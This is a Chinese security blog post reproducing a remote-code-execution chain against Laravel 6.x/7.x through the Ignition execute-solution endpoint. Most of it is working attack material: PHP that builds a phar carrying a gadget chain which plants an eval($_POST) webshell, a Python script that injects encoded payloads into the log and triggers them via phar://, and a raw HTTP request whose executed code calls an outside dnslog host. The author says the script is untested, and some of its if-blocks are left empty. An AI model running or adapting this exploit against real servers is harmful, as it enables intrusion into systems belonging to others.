Laravel 6.x/7.x的一条执行代码的反序列化利用链

作者: print("") 分类: 漏洞复现 发布时间: 2021-06-18 14:48

这两天碰到了一个Laravel  的环境。死活不行。最后还是奶子哥牛逼。

代码如下: 

<?php
// 影响版本没测试过,本地的6.x和目标7.x都可以
namespace Mockery\Generator{
    class MockConfiguration{
        protected $name;

        public function __construct(){
            $this->name = 'a';
        }
    }
    class MockDefinition{
        protected $config;
        protected $code;

        public function __construct(){
            $this->config = new MockConfiguration;
            $this->code = "<?php eval(\$_POST['aa']);?>";
        }
    }
}

namespace Mockery\Loader{
    class EvalLoader{

    }
}

namespace Illuminate\Auth{
    use Mockery\Loader\EvalLoader;
    use Mockery\Generator\MockDefinition;
    class RequestGuard{
        protected $callback;
        protected $request;
        protected $provider;

        public function __construct(){
            $this->callback = 'call_user_func_array';
            $this->request = array(new EvalLoader, 'load');
            $this->provider = array(new MockDefinition);
        }
    }
}

namespace Illuminate\Validation{
    class Validator{
        public $extensions = [""=>"call_user_func"];
    }
}

namespace Illuminate\Broadcasting{
    use Illuminate\Validation\Validator;
    use Illuminate\Auth\RequestGuard;
    class PendingBroadcast{
        protected $events;
        protected $event;

        public function __construct(){
            $this->events = new Validator();
            $this->event = array(new RequestGuard, 'user');
        }
    }
}
namespace {
    use Illuminate\Broadcasting\PendingBroadcast;
    // echo base64_encode(serialize(new PendingBroadcast()));
    $a = new PendingBroadcast;
    $phar = new \Phar("2.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ");
    $phar->setMetadata($a);
    $phar->addFromString("test.txt","123");
    $phar->stopBuffering();
    rename("2.phar","shell.gif");
    echo base64_encode(file_get_contents("shell.gif"));
}
?>

把最开始的脚本改造一下【未测试

# -*- coding: utf-8 -*- 
import requests,json
import sys,re
proxies = {
    "http": '127.0.0.1:8080'}

header={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Content-Type":"application/json"
}


def clearlog(url):
    data = {
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
 }
}
 
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def AA(url):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "AA"
 }
}
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def sendpayloadwindows(url):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "aaaaaaaaa=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=34=00=41=00=67=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=43=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=78=00=66=00=64=00=58=00=4E=00=6C=00=63=00=6C=00=39=00=6D=00=64=00=57=00=35=00=6A=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=58=00=56=00=30=00=61=00=46=00=78=00=53=00=5A=00=58=00=46=00=31=00=5A=00=58=00=4E=00=30=00=52=00=33=00=56=00=68=00=63=00=6D=00=51=00=69=00=4F=00=6A=00=4D=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=45=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=68=00=62=00=47=00=78=00=69=00=59=00=57=00=4E=00=72=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=6A=00=59=00=57=00=78=00=73=00=58=00=33=00=56=00=7A=00=5A=00=58=00=4A=00=66=00=5A=00=6E=00=56=00=75=00=59=00=31=00=39=00=68=00=63=00=6E=00=4A=00=68=00=65=00=53=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=79=00=4E=00=54=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=4A=00=63=00=52=00=58=00=5A=00=68=00=62=00=45=00=78=00=76=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=36=00=4D=00=44=00=70=00=37=00=66=00=57=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=78=00=76=00=59=00=57=00=51=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=45=00=78=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=32=00=61=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=48=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=4A=00=63=00=54=00=57=00=39=00=6A=00=61=00=30=00=52=00=6C=00=5A=00=6D=00=6C=00=75=00=61=00=58=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=31=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=51=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=64=00=58=00=4A=00=68=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=75=00=59=00=57=00=31=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6D=00=45=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=76=00=5A=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=63=00=36=00=49=00=6A=00=77=00=2F=00=63=00=47=00=68=00=77=00=49=00=47=00=56=00=32=00=59=00=57=00=77=00=6F=00=4A=00=46=00=39=00=51=00=54=00=31=00=4E=00=55=00=57=00=79=00=64=00=68=00=59=00=53=00=64=00=64=00=4B=00=54=00=73=00=2F=00=50=00=69=00=49=00=37=00=66=00=58=00=31=00=39=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=44=00=6F=00=69=00=64=00=58=00=4E=00=6C=00=63=00=69=00=49=00=37=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=44=00=41=00=41=00=41=00=41=00=4B=00=55=00=48=00=4D=00=59=00=41=00=4D=00=41=00=41=00=41=00=44=00=53=00=59=00=30=00=69=00=49=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=78=00=4D=00=6A=00=50=00=63=00=54=00=66=00=35=00=51=00=4E=00=74=00=67=00=58=00=79=00=71=00=43=00=47=00=32=00=61=00=41=00=66=00=30=00=49=00=44=00=30=00=38=00=78=00=6C=00=6D=00=42=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00" }
 }
}
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def sendpayloadlinux(url):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "aaaaaaaaa=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=34=00=41=00=67=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=43=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=78=00=66=00=64=00=58=00=4E=00=6C=00=63=00=6C=00=39=00=6D=00=64=00=57=00=35=00=6A=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=58=00=56=00=30=00=61=00=46=00=78=00=53=00=5A=00=58=00=46=00=31=00=5A=00=58=00=4E=00=30=00=52=00=33=00=56=00=68=00=63=00=6D=00=51=00=69=00=4F=00=6A=00=4D=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=45=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=68=00=62=00=47=00=78=00=69=00=59=00=57=00=4E=00=72=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=6A=00=59=00=57=00=78=00=73=00=58=00=33=00=56=00=7A=00=5A=00=58=00=4A=00=66=00=5A=00=6E=00=56=00=75=00=59=00=31=00=39=00=68=00=63=00=6E=00=4A=00=68=00=65=00=53=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=79=00=4E=00=54=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=4A=00=63=00=52=00=58=00=5A=00=68=00=62=00=45=00=78=00=76=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=36=00=4D=00=44=00=70=00=37=00=66=00=57=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=78=00=76=00=59=00=57=00=51=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=45=00=78=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=32=00=61=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=48=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=4A=00=63=00=54=00=57=00=39=00=6A=00=61=00=30=00=52=00=6C=00=5A=00=6D=00=6C=00=75=00=61=00=58=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=31=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=51=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=64=00=58=00=4A=00=68=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=75=00=59=00=57=00=31=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6D=00=45=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=76=00=5A=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=63=00=36=00=49=00=6A=00=77=00=2F=00=63=00=47=00=68=00=77=00=49=00=47=00=56=00=32=00=59=00=57=00=77=00=6F=00=4A=00=46=00=39=00=51=00=54=00=31=00=4E=00=55=00=57=00=79=00=64=00=68=00=59=00=53=00=64=00=64=00=4B=00=54=00=73=00=2F=00=50=00=69=00=49=00=37=00=66=00=58=00=31=00=39=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=44=00=6F=00=69=00=64=00=58=00=4E=00=6C=00=63=00=69=00=49=00=37=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=44=00=41=00=41=00=41=00=41=00=4B=00=55=00=48=00=4D=00=59=00=41=00=4D=00=41=00=41=00=41=00=44=00=53=00=59=00=30=00=69=00=49=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=78=00=4D=00=6A=00=50=00=63=00=54=00=66=00=35=00=51=00=4E=00=74=00=67=00=58=00=79=00=71=00=43=00=47=00=32=00=61=00=41=00=66=00=30=00=49=00=44=00=30=00=38=00=78=00=6C=00=6D=00=42=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00" }
}
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def filterlog(url):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
 "variableName": "username",
"viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
 }
 }
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req
 

def phar(url,path):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "phar://"+path+"\storage\\logs\\laravel.log\\test.txt"
 }
}
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def pharl(url,path):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "phar://"+path+"/storage/logs/laravel.log/test.txt"
 }
}
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def path(url):
    req=requests.get(url).text
    pattern = re.compile(r'(\#\d*\ (.*)(?:\/|\\)vendor)')
    m=pattern.findall(req)
    return m[0][1]

if __name__=='__main__':
	url=sys.argv[1]+"/_ignition/execute-solution"
	clearlog(url)
	clearlog(url)
	clearlog(url)
	clearlog(url)
	clearlog(url)
	if(AA(url).status_code==500):
		if(":" in path(url)):
			print("windows")
			if(sendpayloadwindows(url).status_code==500):
				if(filterlog(url).status_code==200):
					if(phar(url,path(url)).status_code==500):
		if(":" not in path(url)):
			print("linux")
			if(sendpayloadlinux(url).status_code==500):
				if(filterlog(url).status_code==200):
					if(pharl(url,path(url)).status_code==500):

然后去请求当前的phar文件 就可以成功代码执行 

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.10.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 228

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=username&parameters[viewFile]=%20phar:///{phar_path}/logs/laravel.log/test.txt&&aa=file_get_contents('http://kj4oal.dnslog.cn');

奶子哥是真的牛逼

参考链接:https://articles.zsxq.com/id_m5e2g2kw1cld.html

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA